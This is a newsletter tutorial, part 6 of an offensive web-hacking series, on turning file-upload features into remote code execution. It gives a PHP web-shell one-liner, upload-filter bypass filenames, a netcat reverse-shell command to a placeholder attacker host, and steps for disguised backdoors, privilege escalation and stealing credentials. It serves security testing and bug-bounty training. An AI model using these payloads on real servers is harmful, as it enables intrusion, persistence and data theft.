• Zero-Day Wire
  • Posts
  • Break the Web (Week 6): File Uploads & Remote Code Execution

Break the Web (Week 6): File Uploads & Remote Code Execution

File Upload Exploitation: Step-by-Step Tutorial with Web Shells, Filter Bypasses, Polyglot Files & Server Takeover

January 06, 2026

In partnership with

🎯 Week 6: File Uploads & Remote Code Execution

Break the Web: Part 6 of 8

Welcome back to Offensive Tuesday.

Hey πŸ‘‹

Last week you hijacked browsers with XSS. You stole cookies, captured keystrokes, and hooked victims with BeEF. If you missed it, catch up here πŸ‘‰ week 5

This week? We're uploading shells and taking over servers.

Here's what most people don't understand β€” file upload features are remote code execution waiting to happen.

Profile picture upload? Web shell.
Resume submission? Backdoor.
"Secure" document manager? Full server access.

The Equifax breach started with file upload. Countless ransomware attacks used it as the entry point. Bug bounty hunters find these weekly and collect $10K+ payouts.

Today you're learning how to turn upload forms into server takeovers.

β€œAI Won't Replace You. Someone Using AI Will.β€œ
Don't let that happen. Click here πŸ‘‰

Learn AI in 5 minutes a day

This is the easiest way for a busy person wanting to learn AI in as little time as possible:

  1. Sign up for The Rundown AI newsletter

  2. They send you 5-minute email updates on the latest AI news and how to use it

  3. You learn how to become 2x more productive by leveraging AI

🧠 What is File Upload RCE?

Remote Code Execution through file uploads happens when you upload a malicious file that the server executes as code.

Here's the attack chain:

  1. Find a file upload feature (profile pic, document upload, avatar)

  2. Upload a web shell disguised as a legitimate file

  3. Server stores your file without proper validation

  4. You access your uploaded file via URL

  5. Server executes your code instead of serving a static file

  6. You now have command execution on their server

The key difference from other attacks: You're not exploiting a bug in the code. You're abusing a feature working exactly as designed.

The website literally invited you to put files on their server. You just gave them the wrong kind of file.

πŸ’£ Why This Works

Most developers think like this:

"We'll only allow image uploads. Just check the file extension. That's secure, right?"

Wrong.

Here's what they miss:

❌ File extensions can be spoofed β€” shell.php disguised as shell.jpg
❌ MIME types can be faked β€” Send "image/jpeg" header with PHP code
❌ Double extensions work β€” shell.php.jpg gets executed as PHP
❌ Null bytes bypass filters β€” shell.php%00.jpg (server reads .php, stops at null)
❌ Case sensitivity matters β€” shell.PhP when filter only blocks .php
❌ Alternative extensions exist β€” .php5, .phtml, .phar, .phps all execute
❌ Image files can contain code β€” Polyglot files are valid images AND valid PHP

The server stores your file. Then someone (you) requests it. Server sees .php and executes it. Game over.

🎯 The Attack Process

Step 1: Find Upload Points

Look everywhere users can upload files:

βœ… Profile pictures / avatars
βœ… Document uploads (resumes, PDFs)
βœ… Image galleries
βœ… File sharing features
βœ… Import functionality (CSV, XML, JSON)
βœ… Logo uploads
βœ… Cover photos
βœ… Attachment features
βœ… Theme/plugin uploads (WordPress, CMS)
βœ… Backup restore functions
βœ… Configuration file uploads
βœ… Invoice/receipt uploads
βœ… ID verification uploads

Your mantra: If it accepts files, test it.

Pro tip: Admin panels and internal tools have weaker security. They assume "only trusted users will access this." That's your way in.

Step 2: Understand What You're Attacking

Before uploading, figure out the server environment:

Check the tech stack:

  • PHP server? Upload .php shells

  • ASP.NET? Upload .aspx shells

  • Java/JSP? Upload .jsp shells

  • Python? Upload .py shells

  • Node.js? Upload .js shells

How to detect:

  • Check HTTP headers (X-Powered-By, Server)

  • Look at existing file extensions on the site

  • Check error messages

  • Use Wappalyzer browser extension β€” Get it here

  • Run whatweb tool β€” Install here

Find where uploads are stored:

  • Try accessing /uploads/, /files/, /media/, /content/, /assets/

  • Check HTML source for image paths

  • Upload a legitimate file, note the URL

  • That's where your shell will live

Step 3: Create Your Weapon

Start with a simple test payload to prove execution: 

<?php system($_GET['cmd']); ?>

Save as shell.php. Upload it. Access it with ?cmd=whoami and you'll see command output.

That's it. That's remote code execution.

For real attacks, you want full-featured shells that give you file management, database access, and persistence. Grab battle-tested ones instead of writing your own:

πŸ”₯ Web Shell Collections:

For different server languages:

Pro tip: Start with the simple one-liner above. Prove execution. Then upgrade to feature-rich shells for persistence and lateral movement.

Step 4: Bypass Upload Filters

Sites try to block malicious uploads. Here's how to get around them:

πŸ”“ Extension Bypasses:

If .php is blocked, try:

  • .php3, .php4, .php5, .php7, .phtml, .phar, .phps

  • .PhP, .pHp (case variation)

  • .php.jpg (double extension)

  • .jpg.php (reverse double)

  • .php%00.jpg (null byte injection)

  • .php%20 (trailing space)

  • .php:: (NTFS alternate data streams on Windows)

  • .php/. (trailing dot/slash)

πŸ”“ MIME Type Bypasses:

Server checks Content-Type header? Fake it:

  • Upload your shell.php

  • Intercept with Burp Suite

  • Change Content-Type to "image/jpeg"

  • Server thinks it's an image, stores it anyway

πŸ”“ Magic Bytes (File Signature) Bypasses:

Server checks the file's first bytes? Add image headers:

Prepend these magic bytes to your PHP shell:

  • JPEG: FF D8 FF E0

  • PNG: 89 50 4E 47

  • GIF: 47 49 46 38

Now your file looks like a valid image to automated checkers, but still executes as PHP.

πŸ”“ Polyglot Files:

Create files that are BOTH valid images AND valid code:

Tools:

These pass ALL image validation checks and still execute.

πŸ”“ Path Traversal in Filename:

Control where your file gets saved:

  • Filename: ../../../shell.php

  • Might escape the uploads folder and land in web root

  • Now accessible at https://site.com/shell.php

Step 5: Upload and Access

Upload your weaponized file:

  1. Choose your payload based on what works (extension, MIME, polyglot)

  2. Upload through the form

  3. Note the success message or URL

  4. Find where it's stored (usually shown after upload or in your profile)

Access your shell:

Navigate to: https://target.com/uploads/shell.php

If you see your web shell interface or command output, you're in.

Execute commands:

Depending on your shell:

  • ?cmd=whoami β€” Check what user you're running as

  • ?cmd=id β€” Get user ID and groups

  • ?cmd=ls -la β€” List files

  • ?cmd=cat /etc/passwd β€” Read sensitive files

  • ?cmd=nc -e /bin/bash attacker-ip 4444 β€” Reverse shell

Pro tip: Don't go crazy immediately. First, understand the environment. Check privileges, operating system, installed software. Then escalate.

Step 6: Establish Persistence

You have code execution. Now maintain access:

Upload a better shell:

  • Use your basic shell to upload more tools

  • Deploy full-featured web shells (C99, R57, B374K)

  • Create multiple backdoors in different locations

  • Rename them to look innocent (config.php, footer.php)

Create a reverse shell:

  • Listen on your machine: nc -lvnp 4444

  • Execute from web shell: Reverse shell command

  • Get interactive terminal access

  • Full references: Reverse Shell Cheat Sheet

Privilege escalation:

  • Check for sudo misconfigurations: sudo -l

  • Look for SUID binaries: find / -perm -4000 2>/dev/null

  • Check kernel version for exploits

  • Full guide: GTFOBins and LinPEAS

Steal everything valuable:

  • Database credentials (config files, .env files)

  • API keys and secrets

  • User data

  • Source code

  • Other server credentials

🎯 Real-World File Upload Hunting

Where file upload RCE hides in 2025:

πŸ” CMS platforms β€” WordPress, Joomla, Drupal plugin uploads
πŸ” HR portals β€” Resume upload features
πŸ” Social platforms β€” Profile pictures, cover photos
πŸ” E-commerce β€” Product image uploads (vendor panels)
πŸ” File sharing apps β€” "Secure" document managers
πŸ” Support ticketing β€” Attachment uploads
πŸ” Learning management systems β€” Assignment submissions
πŸ” Real estate sites β€” Property image uploads
πŸ” Job boards β€” CV/resume uploads
πŸ” Healthcare portals β€” Medical record uploads
πŸ” Admin panels β€” Logo/theme customization
πŸ” API endpoints β€” /api/upload, /api/files

Bug bounty pro tip: Look for upload features in newly launched sections. Developers rush to ship, security gets skipped. Check changelogs and release notes, then hunt those endpoints first.

πŸ›‘οΈ Why This is Devastating

Here's why file upload RCE is critical severity:

Full server compromise: βœ… Execute arbitrary commands
βœ… Read any file on the system
βœ… Modify application code
βœ… Install malware/ransomware
βœ… Pivot to internal network
βœ… Steal all databases
βœ… Create admin accounts
βœ… Deface the website
βœ… Use server for crypto mining
βœ… Launch attacks on other systems

It bypasses everything: βŒ WAF can't detect it (file upload is legitimate traffic)
❌ Antivirus might miss it (if you obfuscate)
❌ File integrity monitoring? Only if they're checking uploads
❌ Network security? You're attacking via HTTPS
❌ Authentication? Doesn't matter, shell is publicly accessible

Once you upload a working shell, you own that server. Everything else is just cleanup.

πŸ› οΈ Essential File Upload Tools

Scanning & Detection:

  • Burp Suite β€” Intercept uploads, modify requests, test bypasses β€” Download

  • OWASP ZAP β€” Free alternative to Burp β€” Download

  • Upload Scanner β€” Burp extension for automated file upload testing β€” Get it

  • Fuxploider β€” Automated file upload vulnerability scanner β€” Install here

Web Shells & Payloads:

  • Weevely β€” Encrypted PHP shell generator β€” Get it

  • SecLists β€” Web shell collection (PHP, ASP, JSP) β€” Browse here

  • PayloadsAllTheThings β€” File upload payloads and bypasses β€” Check here

  • Metasploit β€” Includes web delivery and shell generation β€” Official site

File Manipulation:

  • exiftool β€” Add/modify image metadata for polyglots β€” Download

  • HxD β€” Hex editor for adding magic bytes β€” Get it

  • ImageMagick β€” Image processing (sometimes exploitable itself) β€” Install

πŸ“š Learning Resources

Deep Dives:

  • OWASP File Upload Guide β€” Complete security reference β€” Read here

  • HackTricks File Upload β€” Comprehensive attack techniques β€” Study here

  • PayloadsAllTheThings β€” All bypass methods documented β€” Browse here

  • HackerOne Disclosed Reports β€” Real file upload RCE bounties β€” Browse here

That's Week 6. πŸš€

Tomorrow (Wednesday): How to secure file uploads and prevent remote code execution.

Next Tuesday (Week 7): SSRF & Internal Access β€” we're making servers attack themselves and accessing internal networks.

See you then.

Your Feedback Matters

Did You Enjoy This Week’s Offensive Tutorial?

Login or Subscribe to participate in polls.

P.S. Got questions? Reply to this email. I read everything.

Reply

or to participate.